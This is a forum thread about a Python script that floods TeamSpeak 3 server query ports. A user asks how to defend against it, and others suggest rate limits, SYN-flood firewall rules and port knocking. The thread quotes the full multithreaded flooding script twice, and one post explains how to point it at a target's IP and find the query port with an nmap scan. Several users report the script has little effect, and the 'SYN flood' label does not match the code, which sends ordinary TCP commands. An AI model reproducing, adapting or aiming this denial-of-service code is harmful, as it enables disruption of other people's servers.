Discussion Be aware from this script - TS3 SYN QUERY PORT FLOODING

Joined
May 22, 2016
Messages
17
Likes
0
Points
41
Location
Turkey
#1
Hello guys,

It's very important for public teamspeak 3 servers
I have very bad problem about this shit python teamspeak 3 exploit.
You do not have permission to view link Log in or register now.

This script is flooding to query with syn packets. After a while your server will crashed or your query port will get rekt and you will cant access to query.
Looks to script codes and if you have any idea about protection query ports from this script, please type your comments.

(Sorry for my bad english)
 
Joined
Nov 18, 2015
Messages
150
Likes
50
Points
63
#4
If when i change my query port, attackers can find my new query port with nmap very easy.
Also i dont want close query port from all ips.
You dont need to close them from all Ips, just set a limit for it and you should be fine & you can make it very hard to scan so it takes Years.
 

Jackbox

Active Member
Joined
Jan 2, 2016
Messages
108
Likes
55
Points
74
Age
24
#10
My Python skills are a bit rusty, so pardon me. I have a feeling swapping the port for a variable would make sense too. :cool:

Code:
# TeamSpeak 3 'SYN/TCP' Flooding With Treading
# Using: /usr/bin/python ts3exploit.py
 
import socket
import threading
import random
 
class MonitorThread(threading.Thread):
        def run(self):
                try:
                        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                        #Change targetAddress to an IP for testing purposes.
                        targetAddress = "127.0.0.1"
                        s.connect((targetAddress, 10011))
                        for i in range(100):
                                s.send('login serveradmin')
                                s.sendto('login serveradmin',(targetAddress, 10011))
                                s.send('clientlist')
                                s.sendto('clientlist',(targetAddress, 10011))
                                s.send('channellist')
                                s.sendto('channellist',(targetAddress, 10011))
                                for i in range(100):
                                        s.send('serverinfo')
                                        s.sendto('serverinfo',(targetAddress, 10011))
                                        s.send('clientlist')
                                        s.sendto('clientlist',(targetAddress, 10011))
                                        for i in range(100):
                                                s.send('serverinfo')
                                                s.sendto('serverinfo',(targetAddress, 10011))
                                                s.send('channellist')
                                                s.sendto('channellist',(targetAddress, 10011))
                                print "\nFLOODING..."
                except Exception, ex:
                        pass
                     
for i in range(100):
        t = MonitorThread()
        t.start()
 

Kieran

Tag me
Contributor
Joined
Jan 1, 2016
Messages
459
Likes
320
Points
122
#11
Hello guys,

It's very important for public teamspeak 3 servers
I have very bad problem about this shit python teamspeak 3 exploit.
You do not have permission to view link Log in or register now.

This script is flooding to query with syn packets. After a while your server will crashed or your query port will get rekt and you will cant access to query.
Looks to script codes and if you have any idea about protection query ports from this script, please type your comments.

(Sorry for my bad english)
This doesn't even work. I had 3 of those running for a while but nothing happened. Ping the same, reaction time the same, query works.
Okay after around 5 minutes the package loss is going up. lets see what else is happening

Nvm not working. Dont know why it temporarily went up
 
Last edited:

developerm

Restricted
Joined
May 22, 2016
Messages
17
Likes
0
Points
41
Location
Turkey
#12
This doesn't even work. I had 3 of those running for a while but nothing happened. Ping the same, reaction time the same, query works.
Okay after around 5 minutes the package loss is going up. lets see what else is happening

Nvm not working. Dont know why it temporarily went up
this script doesnt work on some ips like ovh game or have limited packets size query port servers.
If you want test type your target ip and change 10011 text for query port if you dont know target server query port, you can get query port easy with nmap tcp scan.

My Python skills are a bit rusty, so pardon me. I have a feeling swapping the port for a variable would make sense too. :cool:

Code:
# TeamSpeak 3 'SYN/TCP' Flooding With Treading
# Using: /usr/bin/python ts3exploit.py
 
import socket
import threading
import random
 
class MonitorThread(threading.Thread):
        def run(self):
                try:
                        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                        #Change targetAddress to an IP for testing purposes.
                        targetAddress = "127.0.0.1"
                        s.connect((targetAddress, 10011))
                        for i in range(100):
                                s.send('login serveradmin')
                                s.sendto('login serveradmin',(targetAddress, 10011))
                                s.send('clientlist')
                                s.sendto('clientlist',(targetAddress, 10011))
                                s.send('channellist')
                                s.sendto('channellist',(targetAddress, 10011))
                                for i in range(100):
                                        s.send('serverinfo')
                                        s.sendto('serverinfo',(targetAddress, 10011))
                                        s.send('clientlist')
                                        s.sendto('clientlist',(targetAddress, 10011))
                                        for i in range(100):
                                                s.send('serverinfo')
                                                s.sendto('serverinfo',(targetAddress, 10011))
                                                s.send('channellist')
                                                s.sendto('channellist',(targetAddress, 10011))
                                print "\nFLOODING..."
                except Exception, ex:
                        pass
                    
for i in range(100):
        t = MonitorThread()
        t.start()
You cant attack only change ip address this is not enough, you need change also "10011" text to target ip query port.
If you dont know target ip query port, you can get easily with nmap

Who coded that script xD
i got this script from my friend, i dont know his getting where but i know that this script work on all teamspeak 3 server versions.
Helpppp
 
Last edited by a moderator:

Kieran

Tag me
Contributor
Joined
Jan 1, 2016
Messages
459
Likes
320
Points
122
#15
this script doesnt work on some ips like ovh game or have limited packets size query port servers.
If you want test type your target ip and change 10011 text for query port if you dont know target server query port, you can get query port easy with nmap tcp scan.
Yes I know my query port.. I tried it on my own server and had 3 of them running at the same time. No effect. You sure that's even the script they are using?
 

Sigi

Member
Joined
Aug 15, 2016
Messages
3
Likes
0
Points
35
Age
22
#16
Yes I know my query port.. I tried it on my own server and had 3 of them running at the same time. No effect. You sure that's even the script they are using?
i tried some servers but sometimes not working. i think this protected servers did something for block this script but still dont know how can i save my servers from this script. also for now i just close 10011 port from all ips. but i dont want it, i want my query port be online always. if you have any idea about this plz comment
 

Jackbox

Active Member
Joined
Jan 2, 2016
Messages
108
Likes
55
Points
74
Age
24
#17
i tried some servers but sometimes not working. i think this protected servers did something for block this script but still dont know how can i save my servers from this script. also for now i just close 10011 port from all ips. but i dont want it, i want my query port be online always. if you have any idea about this plz comment
Pretty sure this is a generalized SYN flood. Look at SYN flood protection firewall rules.
 
Joined
Oct 27, 2015
Messages
5
Likes
1
Points
35
Age
29
#20
Instead of fully exposing your query port to the world, use a port knocking script.
It's pretty simple and adds a very good layer of security on your network.
 

Top